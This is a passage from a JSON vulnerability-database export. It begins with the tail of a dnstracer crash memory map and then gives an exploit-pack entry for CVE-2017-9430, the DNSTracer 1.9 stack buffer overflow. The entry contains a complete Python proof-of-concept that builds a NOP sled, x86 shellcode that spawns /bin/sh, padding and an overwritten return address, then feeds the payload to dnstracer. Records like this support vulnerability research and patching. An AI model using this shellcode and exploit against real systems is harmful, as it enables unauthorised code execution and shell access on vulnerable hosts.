/u=\nsr/bin/dnstracer\n563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20\n563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [h=\neap]\n7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /l=\nib/x86_64-linux-gnu/libgcc_s.so.1\n7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /l=\nib/x86_64-linux-gnu/libgcc_s.so.1\n7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /l=\nib/x86_64-linux-gnu/libgcc_s.so.1\n7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /l=\nib/x86_64-linux-gnu/libgcc_s.so.1\n7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /l=\nib/x86_64-linux-gnu/libc-2.24.so\n7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /l=\nib/x86_64-linux-gnu/libc-2.24.so\n7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /l=\nib/x86_64-linux-gnu/libc-2.24.so\n7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /l=\nib/x86_64-linux-gnu/libc-2.24.so\n7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20\n7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /l=\nib/x86_64-linux-gnu/ld-2.24.so\n7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20\n7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20\n7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /l=\nib/x86_64-linux-gnu/ld-2.24.so\n7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /l=\nib/x86_64-linux-gnu/ld-2.24.so\n7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20\n7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [s=\ntack]\n7ffded767000-7ffded769000 r--p 00000000 00:00 0 [v=\nvar]\n7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [v=\ndso]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v=\nsyscall]\nAborted", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:11", "description": "\nDNSTracer 1.9 - Local Buffer Overflow", "edition": 1, "published": "2017-08-03T00:00:00", "title": "DNSTracer 1.9 - Local Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9430"], "modified": "2017-08-03T00:00:00", "id": "EXPLOITPACK:0D9632A56C8FC554A3AD4359D579DF04", "href": "", "sourceData": "# Exploit Title: DNSTracer 1.9 - Buffer Overflow\n# Google Dork: [if applicable]\n# Date: 03-08-2017\n# Exploit Author: j0lama\n# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php\n# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz\n# Version: 1.9\n# Tested on: Ubuntu 12.04\n# CVE : CVE-2017-9430\n# Bug report: https://www.exploit-db.com/exploits/42115/\n# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php\n\n\n# Proof of Concept\nimport os\nfrom subprocess import call\n\ndef run():\n try:\n print \"\\nDNSTracer Stack-based Buffer Overflow\"\n print \"Author: j0lama\"\n print \"Tested with Dnstracer compile without buffer overflow protection\"\n\n nops = \"\\x90\"*1006\n shellcode = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\n filling = \"A\"*24\n eip = \"\\x2f\\xeb\\xff\\xbf\"\n\n #buf size = 1057\n buf = nops + shellcode + filling + eip\n\n call([\"./dnstracer\", buf])\n\n except OSError as e:\n if e.errno == os.errno.ENOENT:\n print \"\\nDnstracer not found!\\n\"\n else:\n print \"\\nError executing exploit\\n\"\n raise\n\n\nif __name__ == '__main__':\n try:\n run()\n except Exception as e:\n print \"Something went wrong\"", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
